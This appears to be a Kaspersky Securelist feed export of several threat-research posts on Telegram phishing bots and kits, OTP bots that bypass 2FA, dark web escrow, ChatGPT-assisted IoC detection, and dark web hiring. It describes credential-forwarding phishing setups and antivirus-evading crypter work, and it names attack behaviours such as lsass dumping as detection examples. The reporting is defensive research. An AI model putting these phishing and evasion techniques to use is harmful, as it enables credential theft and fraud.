  • Do not enable the installation of unknown apps. If some app urges you to do it, it is most likely infected. If it is possible, uninstall the app, and scan the device with an antivirus.
  • Check the permissions of the apps that you use and think carefully before granting an app permissions it doesn’t need to perform its main functions, especially when it comes to high-risk permissions such as Accessibility Services. The only permission that a flashlight app needs is to use the flashlight.
  • Use a reliable security solution that can help you to detect malicious apps and adware before they start misbehaving on your device.
  • Update your operating system and important apps as soon as updates become available. To be sure that an app update is benign, enable automatic system scan in your security solution, or scan the device right after the updates are installed.

For organizations, it is necessary to protect their developer accounts with strong passwords and 2FA, as well as monitor the dark web to detect and mitigate credential leaks as early as possible.

To inquire about Kaspersky threat monitoring services for your organization, please contact us at dfi@kaspersky.com.

]]>
https://securelist.com/google-play-threats-on-the-dark-web/109452/feed/ 1 full large medium thumbnail
The Telegram phishing market https://securelist.com/telegram-phishing-services/109383/ https://securelist.com/telegram-phishing-services/109383/#comments Wed, 05 Apr 2023 10:00:17 +0000 https://kasperskycontenthub.com/securelist/?p=109383

Telegram has been gaining popularity with users around the world year by year. Common users are not the only ones who have recognized the messaging app’s handy features — cybercrooks have already made it a branch of the dark web, their Telegram activity soaring since late 2021.

The service is especially popular with phishers. They have become adept at using Telegram both for automating their activities and for providing various services — from selling phishing kits to helping with setting up custom phishing campaigns — to all willing to pay.

To promote their “goods”, phishers create Telegram channels through which they educate their audience about phishing and entertain subscribers with polls like, “What type of personal data do you prefer?”. Links to the channels are spread via YouTube, GitHub and phishing kits they make.

This story covers the variety of phishing services available on Telegram, their details and pricing, and ways of detecting phishing content that originates in Telegram.

The Telegram black market: what’s on offer

After reviewing phishers’ Telegram channels that we detected, we broke down the services they promoted into paid and free.

Free content for aspiring phishers

Automated phishing with Telegram bots

Functional and configurable, Telegram bots help private users and businesses with automating many routine workflows, such as searching for and retrieving information on schedule, answering frequently asked questions from customers, setting up reminders and many others. Malicious actors use Telegram bots to automate illegal activities, such as generating phishing pages or collecting user data.

The process of creating a fake website with a Telegram bot typically includes the following steps:

  1. The wannabe phisher joins the bot creator’s channel.

  2. As a rule, the bot offers to select a language once started. In the example below, the bot speaks English and Arabic.

    Starting a Telegram phishing bot

    Starting a Telegram phishing bot

  3. The bot offers the user to create a new bot of their own and share the token with the main bot. The purpose of this second bot is to capture data of users who follow the phishing links and attempt to log in to the fake website. It is the budding scammer’s job to set up that new bot on Telegram, but that process is also automated and no rocket science.

    Phishing bot asking the user to set up a new bot and share the token

    Phishing bot asking the user to set up a new bot and share the token

  4. Once the user feeds the token to the first bot, it generates a series of links to fake websites hosted in the same domain. The sites may mimic various services: PUBG, Facebook, PayPal and so on.

    List of off-the-shelf pages in the same domain

    List of off-the-shelf pages in the same domain

Distributing the links is something the wannabe phisher has to do without any help from the bot. If a visitor enters their credentials on the fake page, a notification will be sent to the chat with the bot that our beginning scammer created while generating links to the fake page. The notification will typically contain the phishing link, the victim’s credentials, the name of the country that they logged in from, the country code and the IP address of the device that was used.

Message with the stolen data received by the phisher

Message with the stolen data received by the phisher

Bots that generate phishing pages may differ slightly. For instance, before generating phishing links, one particular bot offers to select a service to mimic and enter a URL the victim will be redirected to after trying to log in. The latter is typically the Google home page or the main page of the service that the phishing page imitates. Once a URL is entered, the bot will generate several scam links targeting users of the service. In this case, victims’ credentials will be sent directly to the phishing bot.

List of services suggested by the bot

List of services suggested by the bot

What are these fake pages that are so easy to generate? A victim who clicks a link in a message that promises, say, 1,000 likes in TikTok will be presented with a login form that looks like the real thing. The page typically contains nothing besides that form. We filled in the login and password fields in the screenshot below.

Fake TikTok login page generated by the phishing bot

Fake TikTok login page generated by the phishing bot

From an engineering standpoint, this is a rather primitive product of a basic phishing kit. When a scammer requests a phishing page from a Telegram bot, it forwards the request along with all required data to a utility that assembles pages from predefined packages and returns hyperlinks. To forward the stolen data to the bot, phishing kits include a script into which the token of the bot that receives user credentials, Telegram bot chat identifier and a URL to redirect the user after entering their credentials will be inserted. Some scripts may lack the URL field.

Script to configure stolen data forwarding to the Telegram bot

Script to configure stolen data forwarding to the Telegram bot

By the way, there is no reason why the developer of a phishing kit cannot configure it to grab a copy of the data obtained by the unsuspecting newbie phisher.

Free phishing kits and users’ personal data

Scammer-operated Telegram channels sometimes post what appears to be exceptionally generous offers, for example, zipped up sets of ready-to-use phishing kits that target a large number of global and local brands.

Archive with phishing kits posted in a Telegram scam channel

Archive with phishing kits posted in a Telegram scam channel

Contents of a free phishing kit archive

Contents of a free phishing kit archive

Phishers also share stolen personal data with their subscribers, tagging it with information on whether it was verified or not. “Yellow light data” in the screenshot below stands for “unknown data quality”. This is probably an allusion to the yellow traffic light.

Files containing free credentials of US and Russian users

Files containing free credentials of US and Russian users

Why would scammers so generously share valuable data with others instead of using it for their own benefit? One reason is that any free content or manuals so willingly distributed by scammers to their Telegram audience serve as bait of sorts for less experienced phishers to bite. Newbies get a taste of what phishing tools can do, pull off their first scam and wish for more, which is when they will be offered paid content.

Another reason is recruiting an unpaid workforce. As mentioned above, the creators of phishing bots and kits can get access to data collected with tools they made. To attract larger audiences, scam operators advertise their services, promising to teach others how to phish for serious cash.

Ad for a Telegram channel offering phishing content

Ad for a Telegram channel offering phishing content

Besides free phishing kits and bot-powered scams, Telegram fraudsters offer paid phishing pages and data, as well as phishing-as-a-service (PhaaS) subscriptions. The service may include access to phishing tools, as well as guides for beginners and technical support.

Malicious actors offer “premium” phishing and scam pages for sale. Unlike the primitive copies of popular websites, these offers include pages built from scratch with a range of advanced capabilities or tools for generating such pages. For instance, a “premium” page may include elements of social engineering, such as an appealing design, promises of large earnings, an anti-detection system and so on.

Scam pages offered for sale in Telegram

Scam pages offered for sale in Telegram

In the screenshot below, the seller promises that each of their “projects” has an anti-bot system, URL encryption, geoblocking and other features that attackers will find useful. The seller goes on to offer custom phishing pages that can include any components requested by the customer.

The seller's description of advanced phishing page functionalities

The seller’s description of advanced phishing page functionalities

After looking closer at these offers, we found that they do contain scripts to block web crawlers and anti-phishing technology. Therefore, these projects are essentially complex or advanced phishing kits.

Contents of a phishing kit archive with an anti-bot system

Contents of a phishing kit archive with an anti-bot system

“Premium page” vendors update their anti-bot systems regularly, so the phishing contents could remain undetected and thus, usable.

Phishing page vendor announcing the anti-bot system has been updated

Phishing page vendor announcing the anti-bot system has been updated

Prices for this kind of fake pages differ, with some vendors asking $10 per copy, and others charging $50 for an archive with several pages in it. A package that includes less frequently offered features, for example, 3-D Secure support, and assistance with configuring a fake website, may cost up to $300.

Scam page with 3-D Secure support offered for $280

Scam page with 3-D Secure support offered for $280

User personal data for sale

Online banking credentials obtained through phishing techniques are often offered for sale too. Unlike the free data mentioned above, these have been checked, and even the account balances have been extracted. The higher the balance, the more money scammers will typically charge for the credentials.

For example, the same Telegram channel offered the credentials for a bank account with $1,400 in it for $110, whereas access to an account with a balance of $49,000 was put up for $700.

Offer of credentials for an account with a balance of $1,400

Offer of credentials for an account with a balance of $1,400

Offer of credentials for an account with a balance of $49,000

Offer of credentials for an account with a balance of $49,000

Phishing-as-a-Service

In addition to one-time sales of phishing kits and user data, scammers use Telegram channels to sell a range of subscriptions with customer support included. Support includes providing updates on a regular basis for the phishing tools, anti-detection systems and links generated by the phishing kits.

An OTP (one-time password) bot is another service available by subscription. Legitimate services use one-time passwords as a second authentication factor. Many organizations enforce a two-factor authentication (2FA) requirement these days, which makes it impossible to hijack an account with just the login and password. Phishers use OTP bots to try and hack 2FA.

The bots call users, posing as the organization maintaining the account that the phishers are trying to hack, and convince them to enter a 2FA code on their phones. The calls are fully automated. The bot then enters the code in a required field, giving the phisher access to the account.

List of OTP bot features and benefits

List of OTP bot features and benefits

According to a bot vendor we talked to, a weekly subscription with unlimited calls will set a beginning scammer back $130, while a monthly subscription including bot customization costs as much as $500.

Our chat with the vendor about OTP bot pricing

Our chat with the vendor about OTP bot pricing

Another OTP bot is offered on a pay-per-minute, prepaid basis. Rates start at $0.15 per minute depending on the destination. The bot can record calls and store settings, such as the victim’s phone number, name and so on.

OTP bot interface: the victim's name and phone number, service name and language are required for setting up a call

OTP bot interface: the victim’s name and phone number, service name and language are required for setting up a call

A customer who shares this information with the bot creators, along with a screenshot showing the victim’s account number, balance and other details, may be rewarded with a small amount added to their OTP bot balance: $5 for two units of information and $10 for three or more.

Some PhaaS vendors take their customers’ trust seriously. In the screenshot below, you can see assurances that all data obtained with paid tools is reliably encrypted, so that neither the vendor nor any third parties can read it. All these vendors want is their customers to remain loyal.

PhaaS vendor explaining to customers that all their data is reliably encrypted

PhaaS vendor explaining to customers that all their data is reliably encrypted

Detection and statistics

Despite phishers who offer their services in Telegram use many ways to avoid blocking, our systems detect their fake sites with maximum precision, adding them to our databases.

Malicious sites generated by phishing bots are either hosted in the same domain, or share parts of HTML code, or both. This makes it easy for our cyberthreat detection technology to discover them.

In the above example of a bot generating phishing pages the same domain was used to host fake websites that mimicked those of various legitimate organizations. We have detected a total of 1483 attempts to access pages located in that domain since it emerged.

Kaspersky anti-phishing detection statistics for a domain linked to a phishing bot, December 2022 through March 2023 (download)

Since many off-the-shelf phishing solutions offered on Telegram are basic or complex phishing kits, here are some relevant detection statistics on those. In the last six months, our technology has detected 2.5 million malicious URLs generated with phishing kits.

Number of detected malicious URLs generated with phishing kits, October 2022 through March 2023 (download)

We prevented 7.1 million attempts by users to access these malicious sites within the same period.

Kaspersky anti-phishing detection statistics for pages generated with phishing kits, October 2022 through March 2023 (download)

Takeaways

Wannabe phishers used to need to find a way onto the dark web, study the forums there and do other things to get started. The threshold to joining the phisher community lowered once malicious actors migrated to Telegram and now share insights and knowledge, often for free, right there in the popular messaging service.

Even the laziest and most cash-strapped can use Telegram bots offered by channel owners to generate phishing pages and obtain data stolen from their victims. Some attackers upload archives with data for anyone to make use of. An aspiring phisher who wishes to generate a greater variety of content can download phishing kits that target a wide range of organizations.

Scammers use an array of free offers to promote paid services. They are also likely manipulating newcomers into using their free phishing kits and bots, which can potentially share stolen data with their creators.

The more solvent audience are offered to pay for phishing pages with geoblocking functionality and regularly updated anti-bot systems, which are harder to detect than those generated with basic phishing kits and bots. Prices range from $10 to $300 and depend on the feature set. Phishers also sell stolen online baking credentials and offer OTP bots subscriptions that can be used to bypass 2FA.

A detailed review of available offers on Telegram phishing channels suggests that the bulk of these consists of phishing kits, which our technology successfully blocks: over the last six months, we have detected 2.5 million pages generated with phishing kits.

]]>
https://securelist.com/telegram-phishing-services/109383/feed/ 1 full large medium thumbnail
Business on the dark web: deals and regulatory mechanisms https://securelist.com/dark-web-deals-and-regulations/109034/ https://securelist.com/dark-web-deals-and-regulations/109034/#respond Wed, 15 Mar 2023 10:00:35 +0000 https://kasperskycontenthub.com/securelist/?p=109034

Download the full version of the report (PDF)

Hundreds of deals are struck on the dark web every day: cybercriminals buy and sell data, provide illegal services to one another, hire other individuals to work as “employees” with their groups, and so on. Large sums of money are often on the table. To protect themselves from significant losses, cybercriminals use regulatory mechanisms, such as escrow services (aka middlemen, intermediaries, or guarantors), and arbitration. Escrow services control the fulfillment of agreements and reduce the risks of fraud in nearly every type of deal; arbiters act as a kind of court of law for cases where one of the parties of the deal tries to deceive the other(s). The administrators of the dark web sites, in turn, enforce arbiters’ decisions and apply penalties to punish cheaters. Most often, these measures consist in blocking, banning, or adding to “fraudster” lists available to any member of community.

Our research

We have studied publications on the dark web about deals involving escrow services for the period from January 2020 through December 2022. The sample includes messages from international forums and marketplaces on the dark web, as well as from publicly available Telegram channels used by cybercriminals. The total number of messages mentioning the use of an escrow agent in one way or another amounted to more than one million, of which almost 313,000 messages were published in 2022.

Dynamics of the number of messages on shadow sites mentioning escrow services in 2022. Source: Kaspersky Digital Footprint Intelligence (download)

We also found and analyzed the rules of operating escrow services on more than ten popular dark web sites. We found that the rules and procedures for conducting transactions protected by escrow on various shadow platforms were almost the same, and the typical transaction pattern that involved escrow services was as follows.

Besides the posts relating to escrow services, we analyzed those relating to arbitration and dispute settlement. We found that the format for arbitration appeals was also standardized. It usually included information about the parties, the value of the deal, a brief description of the situation, and the claimant’s expectations. In addition, parties sent their evidence privately to the appointed arbiter.

What we learned about dark web deal regulation

  • About half of the messages that mention the use of an escrow agent in one way or another in 2022 were posted on a platform specializing in cashing out and associated services.
  • Cybercriminals resort to escrow services—provided by escrow agents, intermediaries who are not interested in the outcome of the deal—not just for one-time deals, but also when looking for long-term partners or hiring “employees”.
  • These days, dark web forums create automated escrow systems to speed up and simplify relatively typical deals between cybercriminals.
  • Any party may sabotage the deal: the seller, the buyer, the escrow agent, and even third parties using fake accounts to impersonate official representatives of popular dark web sites or escrow agents.
  • The main motivation for complying with an agreement and playing fair is the party’s reputation in the cybercriminal community.
  • A deal may involve up to five parties: the seller, the buyer, the escrow agent, the arbiter, and the administrators of the dark web site. Moreover, further arbiters may be involved if a party is not satisfied with the appointed arbiter’s decision and tries to appeal to another.

The reasons to learn how business works on the dark web

Understanding how the dark web community operates, how cybercriminals interact with one another, what kinds of deals there are, how they are made, and what roles exist in them, is important when searching for information on the dark web and subsequently analyzing the data to identify possible threats to companies, government agencies, or certain groups of people. It helps information security experts find information faster and more efficiently without revealing themselves.

Today, regular monitoring of the dark web for various cyberthreats — both attacks in the planning stages and incidents that have already occurred, such as compromise of corporate networks or leakage of confidential documents, is essential for countering threats in time, and mitigating the consequences of fraudulent or malicious activities. As the saying goes, forewarned is forearmed.

Business on the dark web: deals and regulatory mechanisms — download the full version of the report (English, PDF)

]]>
https://securelist.com/dark-web-deals-and-regulations/109034/feed/ 0 full large medium thumbnail
IoC detection experiments with ChatGPT https://securelist.com/ioc-detection-experiments-with-chatgpt/108756/ https://securelist.com/ioc-detection-experiments-with-chatgpt/108756/#comments Wed, 15 Feb 2023 10:00:53 +0000 https://kasperskycontenthub.com/securelist/?p=108756

ChatGPT is a groundbreaking chatbot powered by the neural network-based language model text-davinci-003 and trained on a large dataset of text from the Internet. It is capable of generating human-like text in a wide range of styles and formats.

ChatGPT can be fine-tuned for specific tasks, such as answering questions, summarizing text, and even solving cybersecurity-related problems, such as generating incident reports or interpreting decompiled code. Apparently, attempts have been made to generate malicious objects, such as phishing emails, and even polymorphic malware.

It is common for security and threat researches to publicly disclose the results of their investigations (adversary indicators, tactics, techniques, and procedures) in the form of reports, presentations, blog articles, tweets, and other types of content.

Therefore, we initially decided to check what ChatGPT already knows about threat research and whether it can help with identifying simple, well-known adversary tools like Mimikatz and Fast Reverse Proxy, and spotting the common renaming tactic. The output looked promising!

What about classic indicators of compromise, such as well-known malicious hashes and domains? Unfortunately, during our quick experiment, ChatGPT was not able to produce satisfying results: it failed to identify the well-known hash of Wannacry (hash: 5bef35496fcbdbe841c82f4d1ab8b7c2).

For various APT1 domains, ChatGPT produced a list of mostly the same legitimate domains — or is it that we may not know something about these domains? — despite it provided description of APT actors1.

As for FIN71 domains, it correctly classified them as malicious, although the reason it gave was, “the domain name is likely an attempt to trick users into believing that it is a legitimate domain”, rather than there being well-known indicators of compromise.

While the last experiment, which targeted domains that mimicked a well-known website, gave an interesting result, more research is needed: it is hard to say why ChatGPT produces better results for host-based artifacts than for simple indicators like domain names and hashes. Certain filters might have been applied to the training dataset, or the questions themselves should be constructed if a different way (a problem well-defined is a problem half-solved!).

Anyway, since the responses for host-based artifacts looked more promising, we instructed ChatGPT to write some code to extract various metadata from a test Windows system and then to ask itself whether the metadata was an indicator of compromise:

Certain code snippets were handier then others, so we decided to continue developing this proof of concept manually: we filtered the output for events where the ChatGPT response contained a “yes” statement regarding the presence of an indicator of compromise, added exception handlers and CSV reports, fixed small bugs, and converted the snippets into individual cmdlets, which produced a simple IoC scanner, HuntWithChatGPT.psm1, capable of scanning a remote system via WinRM:

HuntWithChatGPT.psm1
Get-ChatGPTAutorunsIoC Modules configured to run automatically (Autoruns/ASEP)
Get-ChatGPTRunningProcessesIoC Running processes and their command lines
Get-ChatGPTServiceIoC Service installation events (event ID 7045)
Get-ChatGPTProcessCreationIoC Process creation event ID 4688 from Security log
Get-ChatGPTSysmonProcessCreationIoC Process creation event ID 1 from Sysmon log
Get-ChatGPTPowerShellScriptBlockIoC PowerShell Script blocks (event ID 4104 from Microsoft-Windows-PowerShell/Operational)
Get-ChatGPTIoCScanResults Runs all functions one by one and generates reports
Get-ChatGPTIoCScanResults
    -apiKey <Object>
        OpenAI API key https://beta.openai.com/docs/api-reference/authentication
       
    -SkipWarning [<SwitchParameter>]
        
    -Path <Object>
        
    -IoCOnly [<SwitchParameter>]
        Export only Indicators of compromise
        
    -ComputerName <Object>
        Remote Computer's Name
        
    -Credential <Object>
        Remote Computer's credentials
We infected the target system with the Meterpreter and PowerShell Empire agents, and emulated a few typical adversary procedures. Upon executing the scanner against the target system, it produced a scan report enriched with ChatGPT conclusions:

Two malicious running processes were identified correctly out of 137 benign processes, without any false positives.

Note that ChatGPT provided a reason why it concluded that the metadata were indicators of compromise, such as “command line is attempting to download a file from an external server” or “it is using the “-ep bypass” flag which tells PowerShell to bypass security checks that are normally in place”.

For service installation events, we slightly modified the question to instruct ChatGPT to “think step by step”, so that it would slow down and avoid cognitive bias, as advised by multiple researchers on Twitter:

Is following Windows service name ‘$ServiceName’ with following Launch String ‘$Servicecmd’ – an indicator of compromise? Think about it step by step.

ChatGPT successfully identified suspicious service installations, without false positives. It produced a valid hypothesis that “the code is being used to disable logging or other security measures on a Windows system”. For the second service, it provided a conclusion about why the service should be classified as an indicator of compromise: “these two pieces of information indicate that the Windows service and launch string may be associated with some form of malware or other malicious activity and should therefore be considered an indicator of compromise”.

The process creation events in Sysmon and Security logs were analyzed with the help of the corresponding PowerShell cmdlets Get-ChatGPTSysmonProcessCreationIoC and Get-ChatGPTProcessCreationIoC. The final report highlighted some of the events as malicious:

  • ChatGPT identified the suspicious pattern in the ActiveX code: “The command line includes commands to launch a new process (svchost.exe) and terminate the current one (rundll32.exe)”.
  • It correctly characterized the lsass process dump attempt: “a.exe file is being run with elevated privileges and using lsass (which stands for Local Security Authority Subsystem Service) as its target; Finally, dbg.dmp indicates that a memory dump is being created while running a debug program”.
  • It detected the Sysmon driver unload: “the command line includes instructions to unload a system monitoring driver”.

While checking the PowerShell Script blocks, we modified the question to check not only for indicators, but also for presence of obfuscation techniques:

Is following PowerShell script obfuscated or contains indicators of compromise? ‘$ScriptBlockText’

ChatGPT not only detected obfuscation technics, but also enumerated a few: XOR encryption, Base64 encoding, and variable substitution.

Okay, what about false positives or false negatives? Of course, this tool is not perfect and produces both.

In one example, ChatGPT did not detect credentials exfiltration through SAM registry dumping, and in another, described the lsass.exe process as possibly indicative of “malicious activity or a security risk such as malware running on the system”:

An interesting outcome of this experiment is data reduction in the dataset. After the adversary emulation on test system, the number of events for the analyst to verify was reduced significantly:

System metadata Events in dataset Highlighted by ChatGPT # of False Positives
Running Processes 137 2 0
Service Installations 12 7 0
Process Creation Events 1033 36 15
Sysmon Process Creation events 474 24 1
PowerShell ScriptBlocks 509 1 0
Autoruns 1412 4 1

Note that tests were performed on a fresh non-production system. Production will likely generate more false positives.

Conclusions

While the exact implementation of IoC scanning may not currently be a very cost-effective solution at 15-25$ per host for the OpenAI API, it shows interesting interim results, and reveals opportunities for future research and testing. Potential use cases that we noted during the research were as follows:

  • Systems check for indicators of compromise—especially if you still do not have EDR full of detection rules, and you need to do some digital forensics and incident response (DFIR);
  • Comparison of a current signature-based rule set with ChatGPT output to identify gaps—there always could be some technique or procedure that you as analysts just do not know or have forgotten to create a signature for.
  • Detection of code obfuscation;
  • Similarity detection: feeding malware binaries to ChatGPT and trying to ask it if a new one is similar to the others.

A correctly asked question is half the answer—experimenting with various statements in the question and model parameters may produce more valuable results even for hashes and domain names.

Beware of false positives and false negatives that this can produce. At the end of the day, this is just another statistical neural network prone to producing unexpected results.

Download the scripts here to hunt for IoCs. ATTENTION! By using these scripts, you send data, including sensitive data, to OpenAI, so be careful and consult the system owner beforehand.

 

1 Kaspersky’s opinion on the attribution might be different from ChatGPT. We leave it for local and international law enforcement agencies to validate the attribution.

]]>
https://securelist.com/ioc-detection-experiments-with-chatgpt/108756/feed/ 2 full large medium thumbnail
Come to the dark side: hunting IT professionals on the dark web https://securelist.com/darknet-it-headhunting/108526/ https://securelist.com/darknet-it-headhunting/108526/#respond Mon, 30 Jan 2023 10:00:30 +0000 https://kasperskycontenthub.com/securelist/?p=108526

The dark web is a collective name for a variety of websites and marketplaces that bring together individuals willing to engage in illicit or shady activities. Dark web forums contain ads for selling and buying stolen data, offers to code malware and hack websites, posts seeking like-minded individuals to participate in attacks on companies, and many more.

Just as any other business, cybercrime needs labor. New team members to participate in cyberattacks and other illegal activities are recruited right where the business is done – on the dark web. We reviewed job ads and resumes that were posted on 155 dark web forums from January 2020 through June 2022 and analyzed those containing information about a long-term engagement or a full-time job.

This post covers the peculiarities of this kind of employment, terms, candidate selection criteria, and compensation levels. Further information, along with an analysis of the most popular IT jobs on the dark web, can be found in the full version of the report.

Key outcomes

Our analysis of the dark web job market found:

  • The greatest number of ads were posted in March 2020, which was likely related to the outbreak of the COVID-19 pandemic and the ensuing changes in the structure of the job market.
  • The major dark web employers are hacker teams and APT groups looking for those capable of developing and spreading malware code, building and maintaining IT infrastructure, and so on.
  • Job ads seeking developers are the most frequent ones, at 61% of the total.
  • Developers also topped the list of the best-paid dark web IT jobs: the highest advertised monthly salary figure we saw in an ad for a developer was $20,000.
  • The median levels of pay offered to IT professionals varied between $1,300 and $4,000.
  • The highest median salary of $4,000 could be found in ads for reverse engineers.

The dark web job market

Most dark web employers offer semi-legal and illegal jobs, but there are ads with potentially legal job offers that comply with national laws. An example is creating IT learning courses.

Sketchy employment arrangements can border on the illegal and sometimes go against the law. An example of a dubious job is selling questionable drugs for profit on fraudulent websites.

Dirty jobs are illegal and often present a criminal offense. An individual engaged in these can be prosecuted and jailed if caught. Fraudulent schemes or hacking websites, social network accounts and corporate IT infrastructure all qualify as dirty jobs.

Offers like that come from hacker groups, among others. Cybercrooks need a staff of professionals with specific skills to penetrate the infrastructure of an organization, steal confidential data, or encrypt the system for subsequent extortion.

Attack team coordination diagram

Attack team coordination diagram

People may have several reasons for going to a dark web site to look for a job. Many are drawn by expectations of easy money and large financial gain. Most times, this is only an illusion. Salaries offered on the dark web are seldom significantly higher than those you can earn legally. Moreover, the level of compensation depends on your experience, talent, and willingness to invest your energy into work. Nevertheless, unhappy with their pay, a substantial percentage of employees in the legitimate economy quit their jobs to find similar employment on the dark web market. Changes on the market, layoffs, and pay cuts, too, often prompt them to look for a job on cybercrime websites.

Other factors are a lack of certain candidate requirements, such as a higher education, military service record, absence of prior convictions, and so on. Legal age is the main requirements that many ads have in common. Dark web jobs look attractive to freelancers and remote workers because there is no office they have to show up in, and they can remain digital nomads. Candidates are attracted by a large degree of freedom offered on the dark web: you can take as many days off as you want, there is no dress code, and you are free to choose any schedule, tasks and scope of work.

Another reason why people look for a job on the dark web is poor awareness of possible consequences or a flippant attitude to those. Working with underground teams, let alone cybercrime groups, poses serious risks: members can be deanonymized and prosecuted, and even getting paid is not a guarantee.

Example of a resume posting

Example of a resume posting

Dark web job market statistics

To analyze the state of the dark web job market in January 2020 through June 2022, we gathered statistics on messages that mentioned employment, posted on 155 dark web forums. Messages were selected from forum sections on any jobs, not necessarily those in IT.

A total of roughly 200,000 employment-related ads were posted on the dark web forums during the period in question. The largest number of these, or 41% of the total, were posted in 2020. Posting activity peaked in March 2020, possibly caused by a pandemic-related income drop experienced by part of the population.

Ad posting statistics by quarter, Q1 2020–Q2 2022 (download)

The impact of the pandemic was especially noticeable on the CIS markets.

The resume of a candidate who has found himself in a pinch (1)

The resume of a candidate who has found himself in a pinch (1)

See translation

Guy over 25, no addictions, into sports. Quarantined without cash, looking for rewarding job offers, ready to cooperate.

The resume of a candidate who has found himself in a pinch (2)

The resume of a candidate who has found himself in a pinch (2)

Some of the living in the region suffered from reduction of income, took a mandatory furlough, or lost their jobs altogether, which subsequently resulted in rising unemployment levels (article in Russian).

Tags on an ad offering a job amid the crisis

Tags on an ad offering a job amid the crisis

See translation

how to earn money amid crisis
make some cash during pandemic
make money during coronavirus
coronavirus updates
pandemic jobs
jobs amid crisis

Some jobseekers lost all hope to find steady, legitimate employment and began to search on dark web forums, spawning a surge of resumes there. As a result, we observed the highest ad numbers, both from prospective employers and jobseekers, or 6% of the total, in March 2020.

Posting dynamics on dark web job forums in 2020–2022 (download)

Ads seeking jobs were significantly fewer than those offering, with just 17% of all ads we found related to employment. The statistics suggest that jobseekers respond to job ads by prospective employers more frequently than they post resumes.

Resumes posted on dark web forums target diverse areas of expertise and job descriptions: from moderating Telegram channels to compromising corporate infrastructure. This study focused on IT jobs specifically. We analyzed 867 ads that contained specified keywords, 638 of the ads being vacancy postings and 229 being resumes.

The most in-demand professionals on the dark web were developers: this specialization accounted for 61% of total ads. Attackers (pentesters) were second, with 16%, and designers came third, with 10%.

Distribution of dark web job ads across specializations (download)

Selection criteria

The methods of selecting IT professionals on the dark web market are much the same as those used by legitimate businesses. Employers similarly look for highly skilled workforce, so they seek to select the best candidates.

Selection criteria in dark web job postings. The percentages presented were calculated out of the total number of ads that clearly stated selection criteria (download)

Job postings often mention test assignments, including paid ones, as well as interviews, probation periods, and other selection methods.

Job posting that offers applicants a test assignment

Job posting that offers applicants a test assignment

See translation

PM us your resume if you’re interested. We’ll send the suitable candidates a paid test assignment (20,000 rub in BTC at current rate).

One job ad even contained a detailed description of the employee selection process. An applicant had to undergo several rounds of screening, test assignments involving encryption of malware executables and evasion of protective measures, and a probation period.

Example of a candidate selection flow

Example of a candidate selection flow

See translation

Candidate selection procedure:

  1. We give you a test DLL to encrypt. Must be a FUD scantime encrypt with max 3 minor AV runtime detects.
  2. If step 1 completed successfully, you get a live file to encrypt. Must be a FUD scantime encrypt, stay clean for 24 hours (no d/l)
  3. If step 2 completed successfully, we put you on a trial period of two weeks for $40/encrypt. We expect a functional FUD DLL/EXE by 1 PM Moscow time every Monday through Friday.
  4. If trial completed successfully, you were regularly online, doing cleanups, and you showed yourself to be a painstaking and competent professional, we hire you full-time for $800–$1500/week.

The absence of addictions, such as drugs and alcohol, is one of the requirements peculiar to the recruitment process on the dark web.

Job posting saying that only those free from addictions can be selected

Job posting saying that only those free from addictions can be selected

See translation

Teamwork skills, stable connection, no alcohol or drug addictions

Employment terms

Employers on the dark web seek to attract applicants by offering favorable terms of employment, among other things. The most frequently mentioned advantages included remote work (45%), full-time employment (34%), and flextime (33%). That being said, remote work is a necessity rather than an attractive offer on the dark web, as anonymity is key in the world of cybercrime. You can also come across paid time off, paid sick leaves, and even a friendly team listed among the terms of employment.

Employment terms in dark web job postings. The percentages presented were calculated out of the total number of ads that clearly stated the terms of employment (download)

Cybercrime groups, who look for the most highly skilled professionals, offer the best terms, including prospects of promotion and incentive plans.

Employment terms in a dark web job posting

Employment terms in a dark web job posting

See translation

Terms:

  • Paychecks on time. Pay rate ($2000 and up) to be fixed after successful test assignment and interview
  • Fully REMOTE, 5 days/week, Sat and Sun off.
  • PTO
  • NO formal employment contract
  • We offer a continuous increase in pay: with each successful assignment, you get a raise and an instant bonus.

These groups may conduct performance reviews as did Conti. The reviews may result in the employee receiving a bonus or being fined due to unproductivity. On top of that, some underground organizations run employee referral programs offering bonuses to those who have successfully engaged new workers.

Similarly to the legitimate job market, dark web employers offer various work arrangements: full time, part time, traineeships, business relationships, partnerships, or team membership.

Job posting that suggests cooperation

Job posting that suggests cooperation

The absence of a legally executed employment contract is the key differentiator between the dark web and the legitimate job market. This is not to say that you never come across perfectly legal job ads on the dark web. For instance, we discovered several ads seeking a developer for a well-known Russian bank and mentioning a legally executed contract and voluntary health insurance.

Legitimate job ad found on the dark web

Legitimate job ad found on the dark web

See translation
  • Work for a top 50 Russian bank.
  • Formal employment contract
  • VHI starting from first month of employment
  • Work schedule: 5/2, remote work
  • Compensation levels: remote developer in Samara: ₽125,000 gross + 10% annual bonus; onsite developer in Penza: ₽115,000 gross + 10% annual bonus
  • Professional team, friendly environment
  • Challenging task and projects, chance to make a difference

Levels of compensation

We analyzed more than 160 IT job ads that explicitly stated a salary[1]. When reviewing the statistics, it is worth bearing in mind that dark web employers typically state rough salary figures. Many employers provide a pay range or a lower limit.

Job posting that indicates a ballpark level of compensation

Job posting that indicates a ballpark level of compensation

Your level of compensation may grow with time depending on how much effort you invest, your contribution, and how successful the business is on the whole. Compensation is typically indicated in dollars, but in practice work is often paid for in cryptocurrency.

The diagram below shows the minimum and maximum levels of compensation for selected IT jobs.

IT pay ranges from dark web job ads (download)

The most highly paid job at the time of the study was coding, commanding a maximum of $20,000 per month. However, the lower limit there was the smallest: just $200.

Example of offer with the highest salary for developers

Example of offer with the highest salary for developers

The median monthly salary of a reverse engineer was also notably high at $4,000.

Job Median monthly salary
Attacker $2,500
Developer $2,000
Reverse engineer $4,000
Analyst $1,750
IT administrator $1,500
Tester $1,500
Designer $1,300

Median monthly IT salaries on the dark web

Some dark web job ads promised levels of compensation much higher that the figures quoted above, but it included bonuses and commissions from successful projects, such as extorting a ransom from a compromised organization.

Not every job posting made the compensation statistics, as some looked suspicious or openly fraudulent.

Thus, a job ad on the dark web promised up to $100,000 per month to a successful pentesting candidate. Interestingly enough, the work was described as “legal.”

Job posting on a dark web forum offering an inflated compensation figure

Job posting on a dark web forum offering an inflated compensation figure

See translation

search, employee / Seeking website pentesters ХХЕ, XSS, SQL
Looking for a person who knows ХХЕ, XSS, SQL attacks inside and out to pentest our sites for vulnerabilities.
Fully legal
Compensation up to $100,000/mo.
PM for details

Besides the usual hourly, daily, weekly, and monthly rates, there are other forms of compensation that serve as the base pay or complement it. You could come across job ads that offered wages to be paid for completing a job: hacking a website or creating a phishing web page.

